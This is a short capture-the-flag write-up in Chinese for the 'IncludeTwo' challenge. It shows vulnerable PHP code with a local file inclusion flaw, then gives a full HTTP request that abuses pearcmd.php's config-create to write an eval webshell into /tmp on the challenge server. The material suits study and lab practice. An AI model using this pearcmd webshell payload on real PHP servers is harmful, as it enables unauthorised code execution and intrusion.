[WEEK3]IncludeTwo

源码

<?php
error_reporting(0);
highlight_file(__FILE__);
//Can you get shell? RCE via LFI if you get some trick,this question will be so easy!
if(!preg_match("/base64|rot13|filter/i",$_GET['file']) && isset($_GET['file'])){
    include($_GET['file'].".php");
}else{
    die("Hacker!");
}

限制伪协议和文件后缀，很容易联想到pear

Docker PHP裸文件本地包含综述 | 离别歌www.leavesongs.com

用P牛的payload直接打，用burp发包避免被转义

GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd&/<?=@eval($_POST['shell'])?>+/tmp/hello.php HTTP/1.1
Host: 6ae23a9b-185f-455d-9503-18a0af884e8a.node4.buuoj.cn:81
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Previous[WEEK3]Maybe You Have To think More Next[WEEK3]BabySSTI_One

Last updated 3 years ago